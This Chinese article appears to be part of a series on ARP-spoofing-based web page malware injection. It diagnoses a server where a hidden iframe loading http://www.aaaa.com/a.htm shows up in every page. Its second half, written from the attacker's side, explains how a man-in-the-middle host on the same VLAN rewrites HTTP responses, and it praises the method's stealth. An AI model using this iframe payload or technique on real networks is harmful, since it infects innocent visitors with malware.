网站被挂马 ARP地址欺骗解决之道（2）

网页挂马原理

不管是访问服务器上的任何网页，就连404的页面也会在<html>后加入：

<IFRAME SRC=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></IFRAME>

挂马的位置在html标记左右，上面这段恶意代码，它会每隔几秒加入代码，也就是说在输出具体的东西之前就被挂了，有时有有时又没有，不是网页源代码问题，也没有在网页源代码中加入恶意代码，即使重装服务器，格式化重分区过第一个硬盘，放上去网站没多久一样再会出现这种情况。

首先就排除了网站被入侵的可能，因为首页能加在那个位置只能是 title的地方，用js控制也不大可能.然后去看了php.ini的设置也没有任何的异常，而且这个插入的代码有的时候出现有的时候不出现，说明不是网站的问题了。打开同服务器的其他网站也有这个情况发生，而且状况一一样。检查并且搜索挂马的关键字之后确定不是网站程序的问题。

那么剩下的要么是IIS自己出了问题，要么是网络的问题，因为数据是处理没有问题(这个由程序输出，而且即使是html都会出问题)，经过一个一个排查，最后基本可以确定就是arp欺骗欺骗数据报走向，然后中间人修改一些定义的关键字.因为是网络层次有问题(所以重做系统是没有用的)。

目的：通过arp欺骗来直接挂马

优点：可以直接通过arp欺骗来挂马。

通常的arp欺骗的攻击方式是在同一vlan下，控制一台主机来监听密码，或者结合ssh中间人攻击来监听ssh1的密码

但这样存在局限性：1、管理员经常不登陆，那么要很久才能监听到密码。

2、目标主机只开放了80端口，和一个管理端口，且80上只有静态页面，那么很难利用.而管理端口，如果是3389终端，或者是ssh2，那么非常难监听到密码。

优点：1、可以不用获得目标主机的权限就可以直接在上面挂马

2、非常隐蔽，不改动任何目标主机的页面或者是配置，在网络传输的过程中间直接插入挂马的语句。

3、可以最大化的利用arp欺骗，从而只要获取一台同一vlan下主机的控制权，就可以最大化战果。

原理：arp中间人攻击，实际上相当于做了一次代理。

正常时候: A---->B ，A是访问的正常客户，B是要攻击的服务器，C是被我们控制的主机

arp中间人攻击时候: A---->C---->B         B---->C---->A

实际上，C在这里做了一次代理的作用

那么HTTP请求发过来的时候，C判断下是哪个客户端发过来的包，转发给B，然后B返回HTTP响应的时候，在HTTP响应包中，插入一段挂马的代码，比如 <iframe>...之类，再将修改过的包返回的正常的客户A，就起到了一个挂马的作用.在这个过程中，B是没有任何感觉的，直接攻击的是正常的客户A，如果A是管理员或者是目标单位，就直接挂上马了。